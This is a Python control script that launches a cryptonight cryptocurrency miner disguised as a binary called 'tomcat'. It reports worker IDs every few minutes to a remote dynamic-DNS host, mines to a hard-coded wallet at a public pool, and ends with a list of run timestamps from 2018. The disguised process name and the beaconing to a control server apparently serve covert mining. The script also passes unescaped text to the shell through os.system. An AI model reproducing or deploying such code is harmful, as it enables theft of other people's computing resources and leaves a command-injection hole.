import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:31:06.309643
#2018-02-17 17:19:06.162505
#2018-02-17 19:07:04.282391
#2018-02-17 20:56:06.299851
#2018-02-17 22:42:05.456216
#2018-02-18 00:26:04.299291
#2018-02-18 02:17:05.844956
#2018-02-18 04:04:05.693729
#2018-02-18 05:54:06.431362
#2018-02-18 07:45:08.487479
#2018-02-18 09:33:01.513171
#2018-02-18 11:19:06.705017
#2018-02-18 13:05:08.800028
#2018-02-18 14:53:02.115369
#2018-02-18 16:40:07.511033
#2018-02-18 18:29:03.769164
#2018-02-18 20:16:05.001177
#2018-02-18 22:01:02.184771
#2018-02-18 23:50:06.665866
#2018-02-19 01:36:07.014369
#2018-02-19 03:25:07.688416
#2018-02-19 05:10:08.322907
#2018-02-19 06:55:05.925193
#2018-02-19 08:44:05.515156
#2018-02-19 10:33:01.580565
#2018-02-19 12:20:09.826306
#2018-02-19 14:08:06.135140
#2018-02-19 15:56:09.192849
#2018-02-19 17:44:07.823434
#2018-02-19 19:33:05.042562
#2018-02-19 21:20:08.561101
#2018-02-19 23:06:04.111418
#2018-02-20 00:52:05.158330
#2018-02-20 02:41:06.503380
#2018-02-20 04:30:01.692787
#2018-02-20 06:14:03.527275
#2018-02-20 07:59:05.125207
#2018-02-20 09:44:07.051459
#2018-02-20 11:28:05.223560
#2018-02-20 13:14:07.748852
#2018-02-20 14:58:08.879099
#2018-02-20 16:43:10.045877
#2018-02-20 18:29:01.320234
#2018-02-20 20:20:08.983576
#2018-02-20 22:07:01.747850
#2018-02-20 23:47:04.622619
#2018-02-21 01:32:08.077800
#2018-02-21 03:19:06.850792
#2018-02-21 05:07:01.830328
#2018-02-21 06:55:03.738026
#2018-02-21 08:41:05.900246
#2018-02-21 10:27:08.337055
#2018-02-21 12:14:09.278930
#2018-02-21 14:03:07.270553
#2018-02-21 15:53:06.011897
#2018-02-21 17:44:11.282045
#2018-02-21 19:31:10.330842
#2018-02-21 21:19:03.592542
#2018-02-21 23:07:02.186739
#2018-02-22 00:56:03.834537
#2018-02-22 02:42:03.913101
#2018-02-22 04:29:01.466651
#2018-02-22 06:14:01.243176
#2018-02-22 07:58:06.631775
#2018-02-22 09:46:09.183787
#2018-02-22 11:31:01.800752
#2018-02-22 13:19:01.500324
#2018-02-22 15:07:09.283029
#2018-02-22 16:52:10.299210
#2018-02-22 18:41:01.219692
#2018-02-22 20:33:04.675139
#2018-02-22 22:18:06.106392
#2018-02-23 00:06:07.514774
#2018-02-23 01:54:07.456147
#2018-02-23 03:44:09.068606
#2018-02-23 05:33:06.270227
#2018-02-23 07:17:07.831542
#2018-02-23 09:20:10.651357
#2018-02-23 11:25:09.886013
#2018-02-23 13:15:10.364724
#2018-02-23 15:02:04.339201
#2018-02-23 16:51:04.859819
#2018-02-23 18:39:05.993226
#2018-02-23 20:25:09.812340
#2018-02-23 22:12:07.557196
#2018-02-23 23:59:06.427820
#2018-02-24 01:50:07.389407
#2018-02-24 03:42:06.778025
#2018-02-24 05:27:01.568847
#2018-02-24 07:13:07.524316
#2018-02-24 09:01:05.659472
#2018-02-24 11:02:05.044639
#2018-02-24 12:49:07.542064
#2018-02-24 14:38:06.845389
#2018-02-24 16:27:05.249644
#2018-02-24 18:19:05.453038
#2018-02-24 20:05:04.668942
#2018-02-24 21:47:03.490075
#2018-02-25 00:47:06.806082
#2018-02-25 04:40:02.131656
#2018-02-25 08:31:01.191551